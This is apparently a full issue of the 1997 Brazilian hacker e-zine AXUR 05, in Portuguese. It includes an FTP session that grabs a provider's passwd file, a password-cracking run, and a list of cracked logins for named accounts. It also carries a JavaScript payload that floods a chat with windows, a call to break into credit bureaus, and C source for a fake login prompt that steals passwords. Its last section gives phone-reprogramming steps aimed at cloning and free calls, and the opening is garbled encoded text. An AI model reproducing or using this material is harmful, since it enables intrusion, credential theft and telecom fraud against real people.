MN8>S;%7N3[%?;3X_-F?LE#6ZC-B8_HA`K^BX%9K\/7[:Z\:UA$?@SI.W(Z,R M'T^<-'HR>UN-?"SM[)A'T]]KW<\N*%R16UBZ=168.:+U=/*9XK,KB0QDO,\( M@(-P@(-SV]O;_B#YV]W>VR#?W"[? M^B#;_MO;W2#ZV]L@WMO;V_X@_B`@("`@(/G;W=[;(-O;("#>VR#=_B#;(-[; M(-\N("`@(+,-"K,@("#>VR#=WMW>V_H@WMO>WMT@WM_?_MP@V]W>V]T@WML@ MW=[=WMOZ("#V][>W2#>V_H@V]L@W-P@("#V]TN MWMT@V]O>V]T@WMO=(-[;V]O=("`@WMO<_M[;("`@LPT*LR`@(-_?("#;_M_? MWR#?WR#;_B`@W]_?("`@W]_?("#?WR`@V_[?W]\@(-_;W-_^(-_?(-O^(-_? MWR#ZW]_?("`@("#?W]_?("`@(+,-"K,@("`@("`@("`@("`@("`@("`@("`@ M("!(+U`O02]6+TTO0R])+T0O4"\A+TPO1B]/+R$@("`@("`@("`@("`@("`@ M("`@("`@(""S#0K(S2TM^?KZ("`@(/H@^OKY+2W$Q"W$Q,3$Q,3$Q,3$Q,3$ MQ,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$+<3$+2WY^OH@^B`@("#Z^ODM+<3-O`T* ML_H@36Y%=4WM[VE#("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@ M("`@($UN175-;TYI0T!#>6)Eftp ftp> open ginet.com.br Connected to ginet.com.br. 220 pingo FTP server (UNIX(r) System V Release 4.0) ready. User (ginet.com.br:(none)): anonymous 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -la 200 PORT command successful. 150 ASCII data connection for /bin/ls (200.???.???.??,2475) (0 bytes). total 14 drwxr-xr-x 6 0 1 512 Nov 15 20:50 . drwxr-xr-x 6 0 1 512 Nov 15 20:50 .. lrwxrwxrwx 1 0 1 7 Nov 15 20:50 bin -> usr/bin dr-xr-xr-x 2 0 1 512 Nov 15 20:50 dev dr-xr-xr-x 2 0 1 512 Nov 15 20:50 etc drwxrwxrwx 7 30000 1 512 Jan 8 19:19 pub drwxr-xr-x 5 0 1 512 Nov 15 20:50 usr 226 ASCII Transfer complete. 431 bytes received in 0.60 seconds (0.72 Kbytes/sec) ftp> ftp> cd etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 ASCII data connection for /bin/ls (200.???.???.??,2476) (0 bytes). group netconfig passwd 226 ASCII Transfer complete. 26 bytes received in 0.00 seconds (26000.00 Kbytes/sec) ftp> ftp> get passwd 200 PORT command successful. 150 ASCII data connection for passwd (200.???.???.??,2477) (62 bytes). 226 ASCII Transfer complete. 63 bytes received in 0.06 seconds (1.05 Kbytes/sec) ftp> Bom! Ai ta o passwd, em alguns casos o shadow que contem as senhas en- criptadas. Esse e' o provedor onde os caras sao do tipo... burros demais! Agora que temos o arquivo com as senhas o que devemos fazer? Vamos desen- criptalas. Usem o crackerjack se vcs estiverem rodando em ambiente DOS, lembrem-se o cjack nao roda ao mesmo tempo que o ruindows95, entao inicie o prompt em modo de seguranca. Pronto, vou colocar uma sessao de crack nas senhas aqui abaixo. Cracker Jack version 1.4 for OS/2 and DOS (386) Copyright (C) 1993, The Jackal, Denmark PWfile(s) : c:\raiz\contas\ginet\passwd Wordfile : c:\hacking\diction.ary\axur Initializing session data... Loaded 52 total accounts with 50 different salts. Cracking... (Hit any key for status, Ctrl-C to abort) forest (forest) pinara (9871) Depois de exaustivo tempo larguei de mao, porra minha worlist menor tem 3 megas e nunca pegou tao poucas senhas assim, eu uso esta lista com pa- lavras do dicionario quando quero economizar tempo ;) pq uma lista gera- da bem fica com no minino 600 megas. Qual a primeira providencia que eu vou tomar? Vou renomear o arquivo passwd e depois limpar ele, usando os proprios lo- gins como palavras pra wordlist. gampert regis pinara rodinei patricia marcelo marcos fernando::9809:::::: debora:wu6RAjzsZPVmI:9810:::::: fredi:AOIaiY4qoNnjs:9818:::::: bstudio:I3ge9NrA610ck:9818:::::: bbborges:L2bpLO7gP7o7U:9818::::: setup --DEIXAR SOH O LOGIN-- :HB90Lijk05mpE:6445:::::: Vc soh deve deixar a primeira parte como eu fiz no exemplo acima. Ai entao nos vamos tentar novamente crackear o arquivo passwd soh que entendendo que os usuarios usam o login e a senha iguais. Hehehe.. bingo! Vou listar abaixo as senhas que eu peguei usando o metodo de login=senha Provedor: ginet.com.br login - senha - - - - - - bstudio - bstudio oab_pf - oab_pf nuhry - nuhry jtelles - jtelles demo1 - demo1 demo2 - demo2 demo3 - demo3 demo4 - demo4 demo5 - demo5 cmoura - cmoura glaucia - glaucia pedroso - pedroso cotrijal - cotrijal ameplan - ameplan guto - guto jmartins - jmartins lguedes - lguedes coopibt - coopibt jferst - jferst Coisa estupida ne'? Os caras usam quase todas as senhas e logins iguais. Meu irmaozinho tambem achou... Agora e' soh vcs fazerem isso, mas lembrem-se e'muito dificil de achar um provedor estupido assim. ;) Depois que nos aprontamos uma no shell eles cortaram o acesso, ainda dah pra ler uns mails, mas nao dah pra puxar telnet. AciDmuD & VooDoo - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 17-) DETONANDO O CHAT DA UOL ~~~~~~~~~ ~ ~~~~ ~~ ~~~ 1-Comando para abrir 30 janelas do netscape; 2-Esse abre 30 janelas se vc passar o mouse em cima do link, que e' uma ima- gem que pega toda a tela 3-Esse e' para vc entrar na sala sem ser de imagens e detonar com todo mundo que estiver com o java ligado. Abre 30 janelas direto. <imgsrc='http://www.matrix.com.br/frazzon/fogo.gif'><i><B> ¥X×HELL×X¥</B></I><imgsrc='http://www.matrix.com.br/frazzon/ fogo.gif' onLoad="alert('\n Entrei na sala e vc vai sair! \n\n When you mess with the BEST , die like the REST\n\n ¥××HELL××¥!!');variCounter=0;while(true)window.open('http://www.NETural.com/ ~ccamel');"CRASHING"+iCounter('width=1,height=1,resizable=no');iCounter++"&# 62</CENTER> Agradecimento especial a HoTFiRe - }-===============================[chain]===============================-{ 18-) DESAFIO DO MES ~~~~~~~ ~~ ~~~ Nosso obejtivo com o DESAFIO DO MES, que certamente sera mais uma area da revista AXUR 05 e de fazer com que nosso leitores tambem participem. Nao queremos colocar o desafio como meta de vida, mas simplesmente sera uma forma de colocar em enfase o nome de quem conseguir resolver ou re- alizar o que esta sendo proposto. Sem mais, o desafio sera estipulado por membros da revista ou mesmo pes- soal de fora. As regras sao simples, sempre na edicao posterior saira o resultado do problema juntamente com o nome dos que solucionaram. Isto se estes mandarem o mail para - axur05@hotmail.com - e colocarem a res- posta ou demonstrarem como fizeram de forma correta. Vamos-la, queremos ver vcs entrarem para a galeria da fama. E seu nome ser colocado como colaborador da revista. ;) \=- DESAFiO DE JANEiRO -=/ - by AciDmuD Bom, sendo que estamos comecando com esta parte da revista nao queremos colocar algo muito chato logo como primeiro desafio e queremos de algu- ma forma acompanhar o desenvolvimento da tecnica utilizada na tarefa que vamos propor. O esquema e' o seguinte, precisamos do MAIOR numero de informacaos do SCI ( Seguranca ao Credito de Informacoes ), SERASA e SPC. Para que nos queremos essas informacoes? Bom, se voces nao sabem estes sao as instituicoes ou orgaos responsaveis pelo armazenamento de nomes de pessoas (fisicas ou juridica) que nao pa- gam suas contas. Bah...voce pergunta "O que eu tenho com isso?" olha, nos nao devemos pra ninguem mas hackear um sistema desses ia ser muito bom. Imagine voce, limpar o nome de todos os devedores possiveis ( nao que nos que escrevemos a revista devemos alguma coisa :) ) e deixar o pessoal totalmente desorientado. Hahahaha... Vamos propor o seguinte: 1-) Todas as informacoes recebidas estarao a disposicao na nossa HOME PAGE fazendo assim com que cada um possa ir lah e se informar. O endereco da pagina oficial esta no inicio da revista, no topo. 2-) Cada um pode tentar hackear por si mesmo... INDIVIDUAL E AUTONOMO ;) 3-) Caso voce mande alguma coisinha util seu nome sera citado na pagina ( o negocio e' totalmente anonimo ) sera usado um pseudonimo ou nick. 4-) Pela primeira vez vamos mobilizar a comunidade de todo o BR pra deto- nar alguma coisa junto. Isso vai ser muito bom... Como viram nao e' bem um desafio, e' um convite! Procure tudo que souber... como numeros de acesso a linha de dados, pro- tocolos de comunicacao usados, pessoas que sao possiveis informantes. Ate mesmo como e' ou funciona o armazenamento das informacoes... \=- DESAFiO DE JANEiRO -=/ }-===============================[chain]===============================-{ 19-) CARTAS ~~~~~~ Finalmente abrimos nossa parte dedicada somente as cartas, fica ai entao o manifesto da galera que escreveu. Agradecemos que escreveu e esperamos satisfazer a todos, ( isso e' quase impossivel ) com o nosso numero 1 da revista! - - - - - - - - - - - - - From: "____________" <_____@____.__________.___.__> To: acidmud@thepentagon.com Date sent: Fri, 27 Dec 1996 00:29:09 +0000 Subject: Zine Hacker... Priority: normal Grande AciDmuD, Acabei de ler sua revista e posso dizer q ela esta muito boa, principalmente a parte de Anarquia e a de comandos linux. As senhas tbem sao do CACETE... Fora o seu quebrador de senhas animal... Putz, pra numero 1 de uma revista, ta DEMAIS... Bem, sem rasgacao de seda, vamos agora ao q interessa... Eu nao sou tao bom quanto vcs ai, mas sei alguma coisa desse submundo hacker q estamos... E gostaria muito de poder ajudar vcs com a revista, com o q eu puder fazer. Agora, cabe a vcs saber o q eu posso fazer, ne? Outra coisa, queria pedir pra vcs fazerem uma sessao de grupos hackers novos q estao surgindo. Tipo dar o nome, e o email. Seria legal. E tbem, q desse o telnet das melhores bbs hackers do brasil, ou o telefone mesmo, ok??? See Ya Dude. Deltah RESPOSTA: Valeu por ter escrito, ainda nao era o numero 1 da revista, agora que ta saindo realmente o primeiro. O que vc pode fazer e distri- buir a revista para todos os seus amigos e inimgos.. ;) Nos vamos colocar nada da BBS dos outros sem que alguem de lah se mani- feste. Manda os sysopz pararem de cocar a bunda e mandarem seus endere- cos pra telnet ou pra galera telefonar que nos publicamos! - - - - - - - - - - - - - From: "Fantasma, USuckRox ,CyCLOPs" <______@______.___.__> To: acidmud@thepentagon.com Copies to: acidmud@thepentagon.com Subject: »»»»» AXUR 05 ««««« Æ Galera!! Beleza!! Gostei muito da revista(AXUR 05) de vcs muito boa para quem quer comecar como hacker ou pelo menos ter acesso a provedores que abusao de seus clientes. E tenho uma pergunta vcs dizem que e melhor UNIX mais qual e o melhor para isso? Se eu tiver que usar UNIX tenho que formatar meu Wichester nao tera problema se eu criar duas particoes uma Dos e outra No-Dos. Nao gosto muito de UNIX por> que são pessimos os graficos!! Mas sei que e muito bom para trabalhar com isso que estamos falando. Preciso fazer algo diferente mais com cautela para não ser pego. Eu> tenho algumas senhas da braznet mais pelo modo que consigo e tao babaca e muito patetico. Eu fico pedindo o Trumpwsk.ini alguns sao tao babacas que me passam mais quase fui pego com isso por isso parei. Ate ja mudaram as senhas por que alguem estava usado... quem sera!! Por isso tbem vou ficar esperando a nova edicao de vcs e espero que seja melhor que a primeira... Sou o Fantasma e meus outros nicks sao: USuckRox e CyCLOPs. Qualquer coisa sabe onde me encontrar .... Falo pessoal!!! RESPOSTA: Cria uma particao logica e uma nao logica com o comando FDISK, isso e' quase auto-explicativo. Na questao grafica, eu prefiro ficar no 100% shell.. ;) Compra uma controladora e um HD SCSI pra nao se atucanar. - - - - - - - - - - - - - Date sent: Sat, 28 Dec 1996 22:18:08 -0800 From: ________ <________@___.___.__> To: acidmud@thepentagon.com Subject: Revista !!! Muito boa a Revista...continuem a faze-la !!!! Gostaria de esclarecer algumas duvidas referentes as senha e logins que voces colocaram como bonus na revista..... Para mim pode-la usar e ler os e-mail dos outros e ter acesso gratuito eu precisaria discar para o provedor certo ??? Qual o telefone de acesso da Kanopus e Netville ??? Pelo meu provedor eu posso entrar na Kanopus ou Netville e usar ????? Como faco para ler os e-mails ???? Voces tem o Cavalo de Troia ou Homicide ???? se tiver, poderia me enviar..... RESPOSTA: Pra vc ler os mails nao precisa ter acesso discado, e' so mudar a configuracao do seu client pra mail, o telefone da kanopus e' ????????? e da netville ?????????. Acho que pelo menos o telefone voces poderiam ir encontrar, ou e' mais dificil que pegar as senhas??? C faz muitas perguntas porra! ;) - - - - - - - - - - - - - From freejack@br.homeshopping.com.br Fri Jan 3 23:01:44 1997 From: "FreeJack" Address Book To: Subject: Congrats & Stuff.. Ja vi a maior parte da HP e to escrevendo p/ dar os parabens.. Ta concisa, direta, informativa e inteligente! Ate hoje a maioria dos Hackers q conheci, com raras excecoes, eram umas bestas... Detonavam so pelo prazer de detonar... Nao q nao haja prazer, meu Ego e' apenas um pouco menor q minha vontade de saber mais, mas sempre achei q deveria haver algo mais... Sempre achei q se alguem se dedica a adquirir tamanha quantidade de conhecimento, adquire com ela uma responsabilidade de ajudar as pessoas q ainda nao retiraram as viseiras... Pode parecer meio poltico, mas acho q nao ha nada errado c/ isso! Parabens. []s. FreeJack RESPOSTA: Me deixou feliz... por saber que nos estamos fazendo algo realme- nte bom! Obrigado... ;) - - - - - - - - - - - - - *************************************************************************** BONUS EXTRA ----------------------- catador de senhas em maquinas Sun *************************************************************************** CUT HERE-------------------- grabem.c------------------------------------- /* GRABEM 1.0 by The K-Man | A Cute little program to collect passwords on the Sun workstations. */ #define PASSWORD "Password:" #define INCORRECT "\nLogin incorrect" #define FILENAME ".exrc%" #include #include void ignoreSig () { return; } /*-----------------------------------------------------------------------+ | Principal | +-----------------------------------------------------------------------*/ main() { char name[10], /* user name */ password[10]; /* user password */ int i, lab, procid; FILE *fp; signal (SIGINT, ignoreSig); signal (SIGTSTP, ignoreSig); signal (SIGQUIT, ignoreSig); procid = getppid(); system ("\\rm proj2"); printf ("lab#: "); scanf ("%d", &lab); for (i=1; i<40; i++) printf ("\n"); getchar(); for(;;) { for (;;) { printf("lab%1d login: ",lab); gets (name); if (strcmp (name, "") != 0) break; } /*---------------------------------------------------------------+ | Desliga o screen echo, pargunta pelo passwd e coloca o echo | | ligado novamente | +---------------------------------------------------------------*/ system ("stty -echo > /dev/console"); printf(PASSWORD); scanf("%s",password); getchar(); system ("stty echo > /dev/console"); if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { fprintf(fp,"login %s has password %s\n",name,password); fclose(fp); } if (strlen (name) >= 4) break; else printf (INCORRECT); } printf (INCORRECT); kill (procid, 9); } CUT HERE-------------------- grabem.c------------------------------------- - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS - - AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 - - = = = DiA 01 De MARCO = = = - EM TODAS AS BBSz UNDERGROUND -aa -a-a -x -x -u -u -r -rr -000 -55555 -a -a -x -x -u -u -r-r -0 -0-5 -a a-a -x -u -u -rr -0 -0-5555 -a -a -x -x -u -u -r -0 -0 -5 -a -a-x -x -uuu uu -r -000 -5555 -- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = -- ~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~ ~~~~~~ Axur 05 - revista mensal ( todos dia 01 na BBS mais pr¢xima). Pagina oficial: http:\\www.axur05.org - AINDA FORA DO AR Webmaster - VooDoo - voodoo@axur05.org Hackerland, 28 de Fevereiro de 1997 Revista n§ - 2.00 Sem mestres, sem lamahs, sem deuses... somente no's e nossas ma'quinas. Pra salvar a honra dos Brasileiros! yO outside *fuck you* }-===============================[chain]===============================-{ " ... oinc oinc oinc oinc, cade minha lavagem?" - IRCporcs ( IRCOPS ) " Oh, ich Dummkopf... das ist ja zum Teufelholen" - Dr. Tavares INDICE: 1-) OFFERTORIUM 2-) BURLANDO SISTEMA CELULAR BRASILEIRO - Tomo I 3-) GEOCITIES - Verdades e Mentiras 4-) MiSC & UTILz 5-) Diferenca de tempo em comunicacao via satelites (TASI) 6-) Hacking Netware 7-) The Hacker Shell Client & Server - by Oluparun 8-) Fraqueza do Point & Shoot 9-) Shooting Shark's PW Hacker Update 10-) AJUDA & COLABORACAO DOS LEITORES!! 11-) Como conectar qualquer celular em um modem 12-) Algoritmo para Geracao de numeros de CC's 13-) Logo Contest - by csh 14-) Cartas 15-) Lista de passwords para sites pagos - by VooDoo }-===============================[chain]===============================-{ 1-) OFFERTORIUM... ~~~~~~~~~~~~~~ Ainda estamos vivos.... Queria comecar esse offertorium dizendo que apesar de mesquinho, o ser hu- mano tambem eh generoso..... Quando voce fode alguem, essa pessoa quer re- tribui-la com uma trepada mais animal ainda.... o que isso significa? bom, isso vai acabar em sado-masoquismo mesmo... alguem vai sair ferido... Que saia sangue da bunda mais fraca.... nos temos a informacao... bom, para todos que pergutaram a mim, ou a outros editors da axur05, a pa- gina da axur mudou de lugar, fomos chutados da geocities (vide artigo abai- xo), sem uma explicacao plausivel... somente um mail executado por algum script mal feito... apos esse "desabafo", queria dizer que a axur esta to- mando proporcoes astronomicas, sendo lido ate em marte (po, eu tinha q ino- var, mes passado estavamos no japao, pq nao em marte?)... Para o proximo numero, estamos com uma surpresa para todos... espero que voces gostem da axur desse mes, esta contido nesse numero varias materias, muitas de cola- boradores da axur, nao dos editores, ate porque nos estamos trabalhando no proximo numero, que com certeza, deixara MUITOS ezines de queixo caido, da- do a qualidade da ezine... inovando totalmente O estilo em ezines desse genero, mas sempre com o nosso objetivo que voces ja sabem melhor do que eu.... Outra novidade e' o nosso dominio... gracas ao incrivel VooDoo que gastou varios reais e muita forca de vontade, conseguiu por no ar nosso servidor axur05.org. Ele ainda nao esta ativo(agora, 7 de marco..), mas em no maximo duas sema- nas, estara 100% operante... com grandes novidades na nova page da axur... Se voces se lembram do primeiro numero da revista, nao queriamos que pes- soas relacionadas com a estupidez das leis brasileiras, donos ou partici- pante direto nos lucros de provedores, lamers, o que seja, gente que nao deveria ler, infelizmente estao lendo o ezine, dada a explosao que ele vem causando no brasil. O meu protesto fica em relacao ao que querem des- truir os editores da revista... por mais absurdo que pareca, estamos sendo ameacados de morte, o que nos estimula ainda mais a produzir mais e mais pa- ra que os brasileiros tenham acesso ao que sempre foi proibido para nos... Ou voces acham que americanos gostam da gente? quantas vezes voce ja nao entrou no #hackers da undernet e tomou um ban em *!*@*.br? Pensem bastante nisso, o povo brasileiro eh "malandro" suficiente pra detonar qualquer um.. Estamos tentando dar uma ajuda para todos aqui... mas tambem nao queremos que use a revista como unica fonte de informacao... a informacao q contem aqui eh bastante interessante sim!; mas corra atras de sua liberdade, esta- mos tentando armar voces, prepara-los para poderem voar sozinhos... Facam bom proveito desse numero... UPDATE: A axur esse mes teve que demorar um pouco pra ser distribuida, por um fator nada agradavel.... Tivemos problemas com um provedor de acesso, devido a um email anoni- mo que dizia que nos haviamos pego as contas deles... isso nao eh verdade... Ainda estamos com esses problemas... Estamos resolvendo dentro do possivel, e gostariamos de agradecer ao filho da puta que mandou esse email, pela sua tormenta, e tambem ao terrorismo imposto por esse provedor... Offertorium by axur05'editors... }-===============================[chain]===============================-{ 2-) BURLANDO SISTEMA CELULAR BRASILEIRO - Tomo I ~~~~~~~~ ~~~~~~~ ~~~~~~~ ~~~~~~~~~~ Bom resolvi elaborar este esquema para acabar de uma vez com esta confusao no Brasil, onde e' muito dificil encontrar informacoes sobre programacao de celulares, mesmo o basico. Entao o que busco com este texto e' englobar as tres marcas mais vendidas e conhecidas, Motorola, Ericsson e Nokia pois sao aparelhos de facil dominio. Estou disposto com este artigo a tentar incoporar qualquer leigo na progra- macao e tentar avancar com ela na medida do possivel ate um nivel avancado onde qualquer um podera fazer clonagem, escuta e chamadas sem pagar. Pois, afinal de conta, ja estou cansado de ver um sistema de merda igual o gaucho a exemplo de outros que continuam como patrimonio estatal, e consta- tei tb o pessimo atendimento ao publico por parte deles. As informacoes contidas abaixo sao REAIS, portanto e'destinada aos grandes phreakers que se acham os espertos e nao sabem nem puxar um extencao tele- fonica sozinho para seu quarto. Acho que de certa forma vou esclarecer suas duvidas e colocar um boa base, ou seria melhor, tudo aquilo que vc sempre quis saber mas ninguem pode responder... Minha galerinha! Divirtam-se... e nao se esquecam que este e' o nosso mun- do, o mundo dos computadores, o mundo que habitamos, este mundo onde nao existem pessoas e o conhecimento impera! Be happy... Phuck, Phuck, Phuck & Phreak AciDmuD - Global Domination Inc. (c) 1997 * * * * Vamos comecar com a programacao basica dos celulares mais presentes no mer- cado. INSTRUCOES PARA PROGRAMACAO DO NOKIA 638 ( versao curta ) ========================================================= ------------------------------------------------------------------------ | DESCRICAO APERTE VISOR | |------------------------------------------------------------------------| | 1. Ligue o telefone Aperte PWR Visor normal de uso | |------------------------------------------------------------------------| | 2. Entre o codigo de | | acesso de programacao *#639# Cellular Number? | |------------------------------------------------------------------------| | 3. Entre o numero de te- | | fone XXXXXXXXXX XXXXXXXXXX | |------------------------------------------------------------------------| | 4. Verifique o numero do | | telefone Aperte SEND CODE? | |------------------------------------------------------------------------| | 5. Entre codigo de identi- | | ficacao do sistema "SID" | | seguindo por 4 zeros. XXXXX0000 XXXXX | |------------------------------------------------------------------------| | 6. Verificar o SID Aperte SEND ACCEPTED | |------------------------------------------------------------------------| | 7. O aparelho vai desligar Visor normal de uso, veri-| | sozinho fique se o telefone esta | | em "ROAM" | ------------------------------------------------------------------------ 1>Obs. Se "Try Again" aparece na tela, provavelmente um numero incorreto de digitos foi colocado, Aperte "CLR" para limpar a tela, e entre os numeros novamente. 2>Obs.Depois de "ACCEPTED" o aparelho vai desligar sozinho se quando ele ligar aparecer na tela "NAM ERROR" as informacoes nao foram digitadas corretamente. Reprograma o aparelho depois de checar que todas as in- formacoes estao corretas. --- Nao se esqueca que o SID muda de cidade pra cidade desta forma pode-se mudar o SID pra obter acesso a ligacoes intermunicipais como chamadas locais, dificilmente se muda pra outro estado com sucesso, pois o sis- tema telefonico muda muito. No item numero 3. o numero do telefone deve ser colocado na forma Ex: 0519221323- Telefone | Codigo da cidade Ainda na parte de celular NOKIA vamos pro 232... PROGRAMANDO O - NOKIA MODELO 232-101/1000 - PORTATIL ==================================================== ------------------------------------------------------------------------ | PASSO DESCRICAO-VISOR PROGRAMACAO | |------------------------------------------------------------------------| | 01 Ligar aparelho PWR | |------------------------------------------------------------------------| | 02 Teclar password *3001 # 12345, | | STO 0 | |------------------------------------------------------------------------| | 03 Store not done STO | |------------------------------------------------------------------------| | 04 Store CLR | |------------------------------------------------------------------------| | 05 Teclar sequencia 190 # 192 # 0 * | | 12345 STO 01 | |------------------------------------------------------------------------| | 06 Replace Content STO | |------------------------------------------------------------------------| | 07 Store CLR | |------------------------------------------------------------------------| | 08 Teclar NNT 051-9xx-xxxx | | STO 02 | |------------------------------------------------------------------------| | 09 Replace content? STO | |------------------------------------------------------------------------| | 10 Store CLR | |------------------------------------------------------------------------| | 11 Teclar Sequencia 259*1*1*333*0 | | +U*14, # 00 *55* | | 0 STO 03 | |------------------------------------------------------------------------| | 12 Replace Content? STO | |------------------------------------------------------------------------| | 13 Stored CLR | |------------------------------------------------------------------------| | 14 Desligar Aparelho PWR | ------------------------------------------------------------------------ IMPORTANTE: o "U" e' o ultimo numero do telefone. IMPORTANTE: Vc pode tentar programar o telefone NOKIA e ERICSSON quantas vezes vc quiser, mas nao recomendo tentar mais de 2 vezes no telefone MOTOROLA, pois ele possui um mecanismo que reseta a placa na 3 tentativa, isso e' ruim! Pero, um pouco de adrenalina na veia e' bom, entao sei lah! Se vc nao souber resetar depois e programa-la novamente nao tente, ou tera que mandar pra DATEL pra programar novamente ;) Observacoes: ^^^^^^^^^^^^ Quando aperta MENU 7 vai aparecer o numero do telefone habilitado. Codigo de bloqueio= 1234 Selecionar sistema= Menu, 1, VOL ( BOT SISTEMS), STO Pra programar na 2 ( segunda ) NAM, apos o passo numero 6 teclar: ------------------------------------------------------------------------ | 07 Teclar NNT..051-9XX-XXXX, STO 04 STO | |------------------------------------------------------------------------| | 08 Replace content? CLR | |------------------------------------------------------------------------| | 09 Teclar Sequencia 263*1*1*333*0 U * 14,ST0,05,STO | | |------------------------------------------------------------------------| | 10 Replace content? PWR | ------------------------------------------------------------------------ Para selecionar a NAM= MENU 7, VOL, STO Isso vai mudar sua linha ;) Aterar codigo de seguranca=(PASSO 05) 190 #193#0* NOVO CODIGO DE BLOQUEIO, STO, 01, STO, PWR Para alterar o idioma, caso isso facilite= PASSO 4, 0=INGLES 1=FRANCES 2=ESPANHOL Ta facil ne'? Ate a sua avo' consegue programar... ( com oculos claro ) --------------------------- Voltando ao contexto geral, deve ter muito neguinho pensando, O que e' NAM? NAM e' a sigla para Number Assignment Module ou Modulo de Designacao de Nu- mero, onde estao inseridas as informacoes relativas ao sistema celular de operacao do telefone. Os telefones celulares ERICSSON/GE podem possuir uma ou mais NAM que podem ser programadas de duas formas. Curta ou longa. Vamos falar um pouco entao sobre a programacao basica da Ericsson. Este telefone ( AF-738 ) que e' muito presente no mercado possui 4 (quatro) NAM. Se a forma Curta for adotada, certas informacoes de NAM serao assumidas conforme o SID entrado. Em ambos os casos, utilize a tecla # para avancar dentre as opcoes e a te- cla ^ para corrigir um entrada errada e entrar com as informacoes corretas. Use a tecla END para salvar e sair. FORMA CURTA DE PROGRAMACAO: Digite 987 MENU MENU ================================================ MODELO AF-738 ============= ------------------------------------------------------------------------ | DISPLAY DEFINICAO | |------------------------------------------------------------------------| | 1. FCN Numero de s‚rie eletronico * | |------------------------------------------------------------------------| | 2. NAM 1 4? Selecao de NAM 1 a 4 | |------------------------------------------------------------------------| | 3. MIN 1 (2, 3 ou 4) Numero do telefone celular p/NAM 1 (2, 3 ou 4)| |------------------------------------------------------------------------| | 4. SID 1 (2, 3 ou 4) Identificacao do Sistema pra NAM 1 (2, 3 ou 4)| |------------------------------------------------------------------------| | 5. NAM 1 - 4? Se quer colocar mais NAM repita desde o 2 | ------------------------------------------------------------------------ Pressione a tecla END para salvar e sair. Nao sei se ja falei, mas o SID ‚ um codigo particular da rede de cada cidade, se ate o fechamento da revista eu conseguir uma lista com a SID das principais cidades do pais eu coloco. Agora ainda dentro da programacao do Ericsson, vamos ver a programacao que se enquandra para qualquer aparelho. Obs. Ericsson e GE sao a mesma coisa! ;) PROGRAMACAO GE-ERICSSON ======================= TODOS OS APARELHOS ( raras excessoes ) ------------------------------------------------------------------------ | PASSO DESCRICAO PROGRAMACAO | |------------------------------------------------------------------------| | 01 PASSWORD FCN ( pressionado ), 923885 | |------------------------------------------------------------------------| | 02 ESN SOLTAR FCN, STO ou FCN | |------------------------------------------------------------------------| | 03 EMERG 0190, FCN | |------------------------------------------------------------------------| | 04 PHONE XXX 9XXXXXX | |------------------------------------------------------------------------| | 05 MIN 1 FCN | |------------------------------------------------------------------------| | 06 SID 00???, FCN (???=SID da sua cidade)| |------------------------------------------------------------------------| | 07 IPCH 0333, FCN | |------------------------------------------------------------------------| | 08 ACCOLC 0+(Ultimo numero do telefone), FCN| |------------------------------------------------------------------------| | 09 LOCAL USE 1 (ON), FCN | |------------------------------------------------------------------------| | 10 GIM 14, FCN | |------------------------------------------------------------------------| | 11 MIN 2 END | ------------------------------------------------------------------------ 10. - MARK 1 - ON ( troca o "ON" por "OFF" no numero 1 ), STO OBS.: SELECAO DE SISTEMA: FCN, 5 ATE ACHAR ( pref sys ), STO - Particularidades do modelo AH 320 - Ericsson ^^^^^^^^^^^^^^^^ ^^ ^^^^^^ ^^ ^^^ ^^^^^^^^ * Manter pressionado FCN, ligar o aparelho e entrar com a senha * Quando aparecer HEXA solte o "FCN", STO * SEC CODE - Deve ser 0000, STO * NAM 1-2? - 1, STO * MIN 1 11... numero do telefone, STO * Sub. numero - numero do telefone denovo, STO * A-Key - STO * NAM 1-2? - Novamente "END" Bom, chegamos na melhor parte na minha opiniao! Vamos lidar com o aparelho Motorola, um dos grandes lideres do mercado. Este aparelho possui inumeras facilidades ao mesmo que e' flexivel ocasionando facil acesso a placa. Repito, nao programe mais de 2 vezes ele ao menos que saiba o que esta fa- zendo, vc pode resetar a placa e ter que mandar pra assistencia tecnica. MOTOROLA ======== ------------------------------------------------------------------------ | PASSO DESCRICAO PROGRAMACAO | |------------------------------------------------------------------------| | 01 SID * 00??? * ( O SID da sua cidade ) | |------------------------------------------------------------------------| | 02 AREA CODE * 0?? * (Ex. Sao Paulo = 011 ) | |------------------------------------------------------------------------| | 03 PHONE * 9XXMCDU * | |------------------------------------------------------------------------| | 04 SCM * 12 ou 14 * ( use 14 ;) ) | |------------------------------------------------------------------------| | 05 ACCOLC * 0 + Unidade * | |------------------------------------------------------------------------| | 06 GIM * 12 ou 14 * | |------------------------------------------------------------------------| | 07 SECURITY CODE * 000000 * | |------------------------------------------------------------------------| | 08 UN LOCK CODE * 123 * | |------------------------------------------------------------------------| | 09 IPCH * 0333 * | |------------------------------------------------------------------------| | 10 OPTIONS * 10100 * | |------------------------------------------------------------------------| | 11 OPTIONS * 11100 * | |------------------------------------------------------------------------| | 12 TERMINO SEND | ------------------------------------------------------------------------ Obs. NAM 2 - Andaar todos os passos ate o n. 10 e teclar 010110 Transportaveis - Selecao de NAM - RCL, #, CLR, RCL, #, STO Numero de Lista: RCL, # Selecao de sistema -- RCL, * ACHAR "AB" STO MOTOROLA DIGITAL: - PASSO 10: 0708 - PASSO 11: 111100 - PASSO 12: 11110 Lembrete: Nao e' possivel fazer escuta quando o sistema e' digital por- tanto se vc pretende faze-lo procure um sistema que trabalhe no modo ana- logico. ;) Pra ser mais direto, a telefonia brasileira ate onde eu sei e' muito precaria neste sentido, quem sabe com este esquema de privatizar uma banda nao melhore um pouco! Outra coisa que e' fundamental, o numero ESN que esta no seu telefone ce- lular na parte de tras e' a identificacao do aparelho, nunca ouvi falar em casos de aparelhos que ficaram com o mesmo ESN. Este numero se consti- tue da seguintes forma: xxx-xxxxxxxx \__________/ | Na costituicao devemos transformar este numero em HEXADECIMAL Pegamos entao os ultimos 8 numeros, no caso do primeiro dos ultimos oito ser zero no's vamos ignorar ele. xxx-0xxxxxxx \__________/ | O numero 0 da 